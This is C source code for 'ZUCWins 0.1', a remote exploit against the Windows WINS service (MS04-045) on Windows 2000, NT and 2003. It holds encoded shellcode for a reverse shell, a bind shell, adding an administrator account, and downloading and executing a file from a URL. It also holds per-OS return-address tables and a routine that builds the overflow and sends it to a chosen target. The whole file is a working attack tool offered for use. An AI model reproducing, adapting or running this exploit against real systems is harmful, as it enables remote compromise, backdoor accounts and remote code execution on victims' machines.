/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit               */
/* Exploit by : <zuc@hack.it>              		             */ 
/* works on Windows 2000 SP3/SP4 probably every language     */
/*************************************************************/

/* Successfully tested by K-OTik Security on Win2k ALL       */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

// shellcode 
unsigned char reverse_sc[] =  //port->128  ip -> 121   xor 99
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";

unsigned char portbind_sc[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 

"\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E"
//"\xEC\x4A\x70\xE1"    // ExitProcess
"\x7d\x5c\x72\xf2"       //ExitThread
"\x3F\x4B\x97\x5C\xE0\x6C"  
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
#define bindshell_port 201


unsigned char adduser_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 

"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x30\x01\x80\x34\x0a\x99\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\xff\x18\x75\x19\x99\x10\x7f\x71\x2e"
"\x99\x99\x99\x10\x9f\x10\x5a\xca\xf1\xe7\x41\x7b\xea\x71\x24\x99"
"\x99\x99\x10\xdf\x95\xca\xf1\x17\xd7\x97\x75\x71\x36\x99\x99\x99"
"\x10\xdf\x91\xa8\x42\xca\xf1\xe9\xf0\xaa\xab\xf1\xf7\xfc\xed\xf8"
"\xcd\x66\x49\x10\xdf\x9d\x10\x5a\xca\xf1\xc7\x46\xe5\x54\x71\x15"
"\x99\x99\x99\x10\xdf\x89\xca\xf1\x4e\xa4\x95\x5a\x71\xe7\x99\x99"
"\x99\x10\xdf\x8d\xa8\x59\xa8\x42\xda\xc9\xf1\xeb\x99\xea\x99\xf1"
"\xed\x99\xf6\x99\xf1\xeb\x99\xf8\x99\xf1\xea\x99\xed\x99\xf1\xf7"
"\x99\xf0\x99\xf1\xf4\x99\xf0\x99\xf1\xd8\x99\xfd\x99\x10\xff\x85"
"\xc9\xf1\xc1\x99\x99\x99\x10\x78\x10\xd7\x81\xf1\x99\x99\xc5\x99"
"\xc9\xca\xc9\xc9\xca\xc9\xc8\xc8\x10\x78\xc9\xcd\xc8\xca\xc9\x66"
"\xcf\x89\x12\xd7\x81\xd0\xd0\xc8\x10\x78\xf3\x98\xc8\xf3\x9a\x66"
"\xef\x85\xf3\x99\x66\xcf\x8d\x66\xcf\x95\xcf\xf3\xa9\xc0\xfd\x12"
"\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\xc7\x5b\x9d\x99\xca"
"\xcc\xcf\xce\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73"
"\x12\xd3\x81\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77"
"\xa8\x66\x65\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72"
"\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2"
"\x12\xc3\x85\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73"
"\xc6\xc7\xc4\xc2\x5b\x91\x99";

unsigned char download_sc[]= 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  

"\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x2e\x02\x80\x34\x0a\x99\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x1a\x98\x99\x99\xc4\xcc\xa8\x42"
"\xfd\x12\x9a\xd9\x0a\x12\xda\x66\xd9\xec\x60\x12\xca\x9a\xff\xa8"
"\x4b\xff\x21\x99\x89\xff\x18\xa3\xd4\xc3\xed\x9e\xb0\x5b\x70\x6b"
"\x66\x66\x66\x10\x4a\x12\xe3\xa5\x98\x4e\x9a\xc6\xe1\x12\xd2\x81"
"\x12\xea\xb9\x12\xe2\xbd\x98\x4f\x98\x4e\x65\x34\x98\x49\x0f\x1e"
"\x64\xc8\xa8\x50\x19\x58\x96\x6a\x3f\xeb\x93\x0f\xc0\x1e\x64\xed"
"\x8b\xde\xde\x7b\x7f\x27\x96\x99\x99\x99\xb0\x57\xb0\x6e\x70\x71"
"\x66\x66\x66\xa8\x59\xff\x12\x9e\x58\x79\x9b\x12\xea\x85\x98\x4f"
"\x98\x5f\x34\x98\x49\x10\x5f\x10\x4e\xc4\x14\x1c\x39\x99\x99\x99"
"\xd9\x19\xa1\x98\xec\x63\x5f\x99\x99\x14\x1c\x85\x99\x99\x99\xc9"
"\xce\x66\x4f\xf1\x9d\x99\x99\x99\xf1\x99\x89\x99\x99\xf1\xe6\x0f"
"\x01\x99\xf1\x99\x99\x99\x99\x66\x49\x10\x1c\x14\x99\x99\x99\x14"
"\x1c\x96\x99\x99\x99\xc9\xce\x66\x4f\xce\x14\x14\xcc\x99\x99\x99"
"\xc8\x66\x49\x10\x5e\x14\x1c\xc4\x99\x99\x99\xc9\xce\x66\x4f\xa8"
"\x50\xc8\xc8\xc8\xc8\xc8\x66\x49\x10\x5a\x14\x1c\xf2\x99\x99\x99"
"\xc9\xce\x66\x4f\xa8\x50\xc8\xc8\xc8\xc8\x14\x0c\x38\x99\x99\x99"
"\xcb\xca\x66\x49\x10\x5a\x14\x1c\xe5\x99\x99\x99\xc9\xce\x66\x4f"
"\x14\x14\x08\x99\x99\x99\xc8\xf1\xe6\x0f\x01\x99\x66\x2c\x14\x99"
"\x99\x99\xca\x66\x49\xc6\x14\x1c\xb0\x99\x99\x99\xc9\xce\x66\x4f"
"\xf1\x99\x99\x99\x99\x14\x04\x0c\x99\x99\x99\xca\x66\x49\x10\x5a"
"\x14\x1c\xa8\x99\x99\x99\xc9\xce\x66\x4f\x66\x2c\x08\x99\x99\x99"
"\x66\x2c\x14\x99\x99\x99\xca\x66\x49\x14\x1c\xa0\x99\x99\x99\xc9"
"\xce\x66\x4f\xca\x66\x49\x14\x1c\xd8\x99\x99\x99\xc9\xce\x66\x4f"
"\xf1\x9c\x99\x99\x99\x14\x14\x0c\x99\x99\x99\xc8\x66\x49\x14\x1c"
"\xd0\x99\x99\x99\xc9\xce\x66\x4f\xf1\x99\x99\x99\x99\x66\x49\x71"
"\xe1\x67\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd\xeb\xfc"
"\xea\xea\x99\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99"
"\xcf\xf0\xeb\xed\xec\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xc6\xf5\xfa"
"\xeb\xfc\xf8\xed\x99\xc6\xf5\xee\xeb\xf0\xed\xfc\x99\xc6\xf5\xfa"
"\xf5\xf6\xea\xfc\x99\xce\xf0\xf7\xdc\xe1\xfc\xfa\x99\xdc\xe1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xf0\xf7\xd0\xf7\xfc\xed"
"\x99\xd0\xf7\xed\xfc\xeb\xf7\xfc\xed\xd6\xe9\xfc\xf7\xd8\x99\xd0"
"\xf7\xed\xfc\xeb\xf7\xfc\xed\xd6\xe9\xfc\xf7\xcc\xeb\xf5\xd8\x99"
"\xd0\xf7\xed\xfc\xeb\xf7\xfc\xed\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\xf4\xa9\xa9\xb7\xfc\xe1\xfc"
"\x99\xf4\xa9\xa9\xb8";

unsigned long table2k[]={
		0x05392268,	0x05392268,	0x05392268,	0x05392268,	0x05392268,	0x05392268,	0x05392268,	0x05392268,	0x05392268,
		0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,
		0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c,	0x053df47c
};
unsigned long tablent[]={
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x26f21dc,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
	0x27ff488,
};

unsigned long table2003_1[]={
	0x3561eb0,
	0x3561eb0,	
	0x3561eb0,	
	0x3561eb0,	
	0x3561eb0,	
	0x3562140,	
	0x3562140,
	0x3562140,	
	0x3561f28,	
	0x50505050,
	0x60606060,
	0x70707070,
	0x77fb23e8
};
unsigned long table2003_12[]={
		0x03752168,	0x03752168,	0x03752168,	0x03752168,	
		0x03752168,	0x03752168,	0x03752168,	0x03752168,	
		0x0379f494,	0x0379f494,	0x0379f494,	0x0379f494,
		0x0379f494,	0x0379f494,	0x0379f494,	0x0379f494,
};
unsigned long table2003_2[]={
			0x36f1eb0,   //0
			0x36f1eb0,   //4
			0x36f1eb0,   //8
			0x36f1eb0,   //c
			0x36f1eb0,   //10
			0x36f2240,   //14
			0x36f2240,   //18
			0x36f2240,   //1c
			0x36f1ec0,   //20
			0x50505050,  //24
			0x60606060,  //28
			0x70707070,  //2c
			0x77fc23e8   //30
};
struct {
	int  id;
	char *header;
	int	 header_len;
	unsigned long *table;
	int  table_len;
	char *OS;
} ENGaddr[] ={
	{ 0 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x05\x39\x1e\xc8", 12,table2k, 0x5c, "Windows 2K ALL"}, 
	{ 1 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x00\x00\x7f\xec\xb0\x1e\x75\03", 16,table2003_12, 0x40, "Windows 2003 CN 5.2.3790"},
	{ 2 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x00\x00\x7f\xec", 12,table2003_1, 0x34, "Windows 2003 CN 2#"},
	{ 3 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x00\x00\x7f\xec",12, table2003_1, 0x34, "Windows 2003 EN"},
	{ 4 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x00\x00\x7f\xec", 12,table2003_2, 0x34,  "Windows 2003 EN #2"},
	{ 5 , "\x00\x00\x23\xf8\x29\x00\xff\x23\x02\x6f\x1d\xf0", 12,tablent, 0x5c, "Windows NT ALL"},
	{-1 }
};

void print_usage(char *prog) 
{ 
	printf(" Usage:\n");
	printf("\t%s command [option] -t <targetIP[:port]>\n\n", prog);
	
	printf("\t\tcommand:\n");
	printf("\t\t\t -r <ip>\treverse link_IP\n");
	printf("\t\t\t -b     \tbind port\n");
	printf("\t\t\t -d <url>\tdownload <url> file and execute it.\n");
	printf("\t\t\t -a      \tAdd user X,This is default command.\n");
	
	printf("\t\toption:\n");
	printf("\t\t\t -p <port>\tSet bind or reverse port. default=7777\n");
	printf("\t\t\t -o <index>\tSelect OS.\n");
	
	printf("\n\t-o (OS Index)\n");
	for(int i=0;ENGaddr[i].id!=-1;i++)
		printf("\t\t <%d> : \"%s\"\n",ENGaddr[i].id,ENGaddr[i].OS);
	printf("\n%s -h list help.\n",prog);
	exit(-1);
} 

int 
main(int argc, char **argv) 
{ 
	char endofurl = '\x01'; 
	
	unsigned short port=7777; 
	unsigned long  ip;
	unsigned char *sc;
	int            sc_size=0;
	
	char  *url;
	int   attack_mode = 3;
	
	char winshost[16]="127.000.000.001";
	int  winsport=42;
	
	printf("\n( MS04-045 ) Microsoft Windows Wins Vulnerability\n\n"); 
	int os=0;
	// process commandline 
	for (int i = 0; i < argc; i++) 
	{
		
		if (argv[i][0] == '-') 
		{
			
			switch (argv[i][1]) 
			{
				
				// reverse connect 
			case 'r':
			case 'R':
				if(i+1>argc) print_usage(argv[0]);
				ip = inet_addr(argv[i+1]);
				attack_mode = 1;
				break;
				
				// bind 
			case 'b':
			case 'B':
				attack_mode = 2;
				break;
				
				// Add.Admin
			case 'a':
			case 'A':
				attack_mode = 3;
				break;
				
				// DL
			case 'd':
			case 'D':
				if(i+1>argc) print_usage(argv[0]);
				url = argv[i+1];
				attack_mode = 4;
				break;
				
				// port 
			case 'p':
			case 'P':
				if(i+1>argc) print_usage(argv[0]);
				port = atoi(argv[i+1]);
				break;
				// OS Index
			case 'O':
			case 'o':
				if(i+1>argc) print_usage(argv[0]);
				int index;
				for(index=0; ENGaddr[index].id != atoi(argv[i+1]) && ENGaddr[index].id != -1; index ++);
				if(ENGaddr[index].id!=-1){
					os = index;
				}
				else{
					printf("\nWarnning : !!! You may select a unknown OS !!!\n\n");
					print_usage(argv[0]);
					return 0;
				}
				break;
			case 't':
			case 'T':
				if(i+1>argc) print_usage(argv[0]);
				memset(winshost,'\0',16);
				if(strstr(argv[i+1],":")){
					strncpy(winshost,argv[i+1],strstr(argv[i+1],":")-argv[i+1]);
					winsport = atoi(strstr(argv[i+1],":")+1);
				}
				else {
					strncpy(winshost,argv[i+1],strlen(argv[i+1])>15?15:strlen(argv[i+1]));
				}
				break;
				
			case 'h':
			case 'H':
				print_usage(argv[0]);
				break;
				
			default:
				print_usage(argv[0]);
				break;
			}
		}
	}	
	switch(attack_mode){
	case 1:  // reverse
		ip = ip^(unsigned long)0x99999999;
		port = htons(port)^(unsigned short)0x9999;
		memcpy(&reverse_sc[128], &port, 2);
		memcpy(&reverse_sc[121], &ip, 4);
		sc = reverse_sc;
		sc_size = sizeof(reverse_sc)-1;
		break;
	case 2:  // bind
		port = htons(port)^(unsigned short)0x9292;
		memcpy(&portbind_sc[bindshell_port], &port, 2); 
		sc = portbind_sc;
		sc_size = sizeof(portbind_sc)-1;
		break;
	case 3: // Add user
		sc = adduser_sc;
		sc_size = sizeof(adduser_sc)-1;
		break;
	case 4: // Download and execute
		sc = (unsigned char *)malloc(sizeof(download_sc)+strlen(url)+1);
		if(sc==NULL) print_usage(argv[0]);
		memcpy(sc,download_sc,sizeof(download_sc)-1);
		sc_size = sizeof(download_sc)-1;
		memcpy(sc+sc_size,url,strlen(url));
		sc_size += strlen(url);
		sc[sc_size]='\x01';
		break;
	default:
		print_usage(argv[0]);
		break;
	}
	
	WSADATA lpwsdata;
	SOCKET sock;
	struct hostent *he;
	struct sockaddr_in mytcp;
	
	int len=16;
	int rc;
	
	int ir,lenr;

	char buff[0x23fc];
	for(ir=0;ir<0x23fc;ir++)
		buff[ir]='\x90';

	memcpy(buff,ENGaddr[os].header,ENGaddr[os].header_len);
	lenr = ENGaddr[os].table_len;
	for(ir=0;ir<10;ir++)
		memcpy(buff+ENGaddr[os].header_len+ir*lenr,ENGaddr[os].table,lenr);
	memcpy(buff+0x485,sc,sc_size);

	
	if(WSAStartup(MAKEWORD(1,1),&lpwsdata)){
		perror("WSASTartup:");
		return -1;
	}
	printf("TARGET : %s:%d\n",winshost,winsport);
	sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (sock==-1)
	{ 
		perror("[-] socket ");
		return -1;
	}
	if((he = gethostbyname(winshost)) == NULL){
		perror("[-] gethostbyname ");
		printf("[-] winshost : %s\n",winshost);
		return -1;
	}
	
	memset(&mytcp,'\0',sizeof(mytcp));
	mytcp.sin_addr = *((struct in_addr *)he->h_addr);
	mytcp.sin_family = AF_INET;
	mytcp.sin_port=htons(winsport);
	
	printf("[*] connecting the target : %s\n",winshost);
	
	rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
	if(rc==-1){
		perror("[-] connect ");
		printf("[-] socket=%d errno=%d\n",sock,GetLastError());
		closesocket(sock);
		return -1;
	}
	printf("[*] sending exploit....\n");


	lenr = 0x23fc;
//	lenr = 0x100;
//	(*(DWORD *)buff)=lenr - 4;
	if((ir=send(sock,buff,lenr,0))!=lenr) {
		perror("[-] send ");
		printf("send : %d %d\n",ir,lenr);
		closesocket(sock);
		return -1;
	}
	printf("[*] exploit sent Done.\n");
	Sleep(5);
	shutdown(sock,1);
	closesocket(sock);
	return 0;
}